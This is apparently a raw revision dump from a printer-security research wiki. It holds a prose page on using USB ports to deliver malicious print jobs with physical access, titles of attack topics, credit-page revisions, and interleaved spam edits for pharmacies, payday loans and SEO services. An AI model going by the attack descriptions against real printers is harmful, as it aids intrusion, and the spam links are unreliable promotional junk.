disclosure]] attacks, the result can simply be leaked by printing it on paper --> <!-- smart card based access control --> aeeb93fecd1d58c620d437065e5e7608fbd4c48e 91 2017-01-10T16:14:24Z Admin 1 Created page with "Data can be send to and received from a local printer by [https://en.wikipedia.org/wiki/USB USB] or [https://en.wikipedia.org/wiki/IEEE_1284 parallel] cables. Both channels ar..." wikitext text/x-wiki Data can be send to and received from a local printer by [https://en.wikipedia.org/wiki/USB USB] or [https://en.wikipedia.org/wiki/IEEE_1284 parallel] cables. Both channels are supported by [[PRET]] to communicate with the device. In addition, printers and MFPs often ship with ''Type-A'' USB ports which allows users to print directly form a USB drive. While plugged-in USB drives do not offer a bidirectional channel, their usage in a crowded copy room may seem less conspicuous. Obviously, exploiting USB printers requires the attacker to gain physical access to the device. However, it is not completely unrealistic for most institutions and companies. Gaining physical access to printer can generally be considered as less hard than it is for other network components like servers or workstations. This is because printers are usually shared by and accessible to a whole department. Sneaking into an unlocked copy room and launching a malicious print job from USB stick is only a matter of seconds. Further real-world scenarios include copy shops or publicly available printers at schools and universities. <!-- and for PostScript based [[information disclosure]] attacks, the result can simply be leaked by printing it on paper --> <!-- smart card based access control --> 4269b5d41c8845b359ad7cb60454de2a9b6fd0cf 1 299 569 2017-02-08T10:04:20Z 217.99.116.183 0 dna moczanowa atak dna moczanowa jaka dieta wikitext text/x-wiki dna alkohol choroba dna moczanowa objawy <a href=http://seeknet.pl/>http://seeknet.pl/</a> co jesc przy dnie moczanowej podagra 6e808516ee35da9b387ce48853fcb0e81023b2b7 1 306 641 2017-08-15T01:22:35Z 81.202.13.76 0 Created page with "What's the password for ftp://ftp.kdaconnect.com/ ?" wikitext text/x-wiki What's the password for ftp://ftp.kdaconnect.com/ ? fd0fd82b3c766e31e48322feff9c129705361c45 1 301 612 2017-03-03T17:24:50Z 91.200.12.141 0 It drinking obturator discordant psychopathology. wikitext text/x-wiki http://without-prescription-buyretin-a.net/ - without-prescription-buyretin-a.net.ankor <a href="http://doxycycline100mgbuy.com/">doxycycline100mgbuy.com.ankor</a> http://cialistadalafillowest-price.net/ 92490806d7d29b45cc2d0336d4f0a4e6afbdd50f 1 305 640 2017-07-20T12:32:10Z 37.113.27.248 0 заказать продвижение интернет магазина wikitext text/x-wiki Мы ценим ваше время и делим с вами общие цели. Ваши продажи для нас главный приоритет. оптимизация сайта быстро)логин скайпа SEO2000 оращайтесь договримся есть примеры работ логин скайпа SEO2000 a13b0f477fef4ce76c19833226a707a7f9359b17 1 307 642 2017-08-16T19:10:14Z 178.137.131.2 0 Forex Brokers Review today !!! wikitext text/x-wiki http://fx-brokers-review.com/index_ba.html Analiza i upoređivanje deviznih preduzeća. 9fc6eefdbee886f1b4611dcedd5693c2c3f42274 1 304 635 2017-06-28T15:42:56Z 91.200.12.106 0 For demarcated, sexual, antibiotic viral, potential. wikitext text/x-wiki http://100mg-viagracanada.com/ - 100mg-viagracanada.com.ankor <a href="http://sertralinezoloftonline.com/">sertralinezoloftonline.com.ankor</a> http://20mg-tadalafil-lowest-price.com/ 3a0d8818773b0a87a98f24bcdf404dc0aaa1cdcc 1 308 643 2017-08-30T08:00:34Z 46.161.9.3 0 payday loan store wikitext text/x-wiki payday loans for bad credit <a href="http://cashadvances2017.com"> payday loans online</a> &lt;a href=&quot;http://cashadvances2017.com&quot;&gt; payday loans online no credit check&lt;/a&gt; http://cashadvances2017.com - online payday loans payday loan no credit check c595194b3a08d724d6cc1a328a709c0ed537b42d 1 309 644 2017-09-09T06:06:16Z 46.161.9.3 0 where to buy viagra online wikitext text/x-wiki fast auto and payday loans <a href="http://paydayloans2017.com"> guaranteed payday loans</a> &lt;a href=&quot;http://paydayloans2017.com&quot;&gt; payday loans no credit check&lt;/a&gt; <a href=http://paydayloans2017.com>payday loan online</a> payday loans online same day 87cd8a4323cd3842aa31785022d70106560283d6 4 15 651 47 2018-07-20T08:49:42Z Admin 1 wikitext text/x-wiki The '''Hacking Printers Wiki''' was created by [https://www.nds.rub.de/chair/people/jmueller/ Jens Müller], but its continued success depends on the contributions from many individuals in the security community. Thanks to everybody for your help! 3289a0697250a78ab504a5b3e87459608f45e1a8 47 46 2017-01-05T14:45:53Z 134.147.128.156 0 wikitext text/x-wiki The '''Hacking Printers Wiki''' was created by [http://homepages.rub.de/jens.mueller-2/ Jens Müller], but its continued success depends on the contributions from many individuals in the security community. Thanks to everybody for your help! 346a15cae7adc4bc152b70f089efd9b0e81a987e 46 45 2017-01-05T14:45:03Z 134.147.128.156 0 wikitext text/x-wiki The ''Hacking Printers Wiki'' was created by '''Jens Müller''', but its continued success depends on the contributions from many individuals in the security community. Thanks to everybody for your help! 9cc44fe9d1a82552628c4c101380fcdfb1651013 45 2017-01-05T14:44:54Z 134.147.128.156 0 Created page with "The ''Hacking Printers Wiki'' was created by '''Jens Müller'', but its continued success depends on the contributions from many individuals in the security community. Thanks..." wikitext text/x-wiki The ''Hacking Printers Wiki'' was created by '''Jens Müller'', but its continued success depends on the contributions from many individuals in the security community. Thanks to everybody for your help! b5634c7c99772ed63a66a26a3bfe2c221f8da9f9 6 52 228 2017-01-24T18:45:12Z Admin 1 Advanced cross-site printing with CORS spoofing wikitext text/x-wiki Advanced cross-site printing with CORS spoofing 68e7f2aad539a6f88dc9ee2c3baa32f82e2e056c 6 63 265 2017-01-28T15:08:16Z Admin 1 Dedicated print servers as a countermeasures to sandbox printers wikitext text/x-wiki Dedicated print servers as a countermeasures to sandbox printers 895c4f358a727a84cc9b754daa42e14aeab9865c 6 55 236 2017-01-28T14:06:50Z Admin 1 Overview of channels to deploy (potentially malicious) print jobs wikitext text/x-wiki Overview of channels to deploy (potentially malicious) print jobs f13d3e070f520dcc7e75ed08448bb55cbf1fba2b 6 46 202 2017-01-23T15:26:27Z Admin 1 The PostScript dictionary stack wikitext text/x-wiki The PostScript dictionary stack 90d23d8e8e036f5a36c9dce2ca14c5c2435ac6dd 6 59 240 2017-01-28T14:09:51Z Admin 1 IPP (malicious) print job deployment channel wikitext text/x-wiki IPP (malicious) print job deployment channel 5b190d1db436957b7074c48fecc89022d94d436d 6 62 243 2017-01-28T14:10:20Z Admin 1 LPD (malicious) print job deployment channel wikitext text/x-wiki LPD (malicious) print job deployment channel 57811b1871b780f8012dfbca8860b4e098d5a1b0 6 48 212 2017-01-23T17:12:53Z Admin 1 Smiley overlay attack on other users jobs wikitext text/x-wiki Smiley overlay attack on other users jobs b64c76392ad813ca63f5dd6688584886696a74cc 6 50 220 2017-01-23T18:41:31Z Admin 1 PJL display ‘hack’ wikitext text/x-wiki PJL display ‘hack’ 81a107c5481631c7e02da396185e2d0ac309eb2c 6 56 237 2017-01-28T14:09:43Z Admin 1 Attack the interpreters, not the printing channels wikitext text/x-wiki Attack the interpreters, not the printing channels 77046acea23ece993f78b6b95efbf453a2168887 6 18 59 2017-01-07T18:42:37Z Admin 1 High-level overview of printing protocols and languages wikitext text/x-wiki High-level overview of printing protocols and languages 8ee88e36260bcead3bcf86d9e283f79f4266150d 6 57 238 2017-01-28T14:09:48Z Admin 1 Raw (malicious) print job deployment channel wikitext text/x-wiki Raw (malicious) print job deployment channel 382b51ee29dfae21c5c89f8f5bce55b851971dbf 6 58 239 2017-01-28T14:09:49Z Admin 1 SMB (malicious) print job deployment channel wikitext text/x-wiki SMB (malicious) print job deployment channel 051a0006704270b69e38401f7a3ba80abdfd27c4 6 49 218 2017-01-23T18:33:37Z Admin 1 Printers directly reachable over the Internet wikitext text/x-wiki Printers directly reachable over the Internet 22ef78f6981bb44f5f8826dfbd69188702e3b517 6 60 241 2017-01-28T14:09:54Z Admin 1 USB (malicious) print job deployment channel wikitext text/x-wiki USB (malicious) print job deployment channel f38ac5fbe1d3a0c719da5d9f9754b13e9985c53a 6 61 242 2017-01-28T14:09:57Z Admin 1 XSP (malicious) print job deployment channel wikitext text/x-wiki XSP (malicious) print job deployment channel 5bd0990cf4f5bc614d07cfaac33dc05637b7c3d7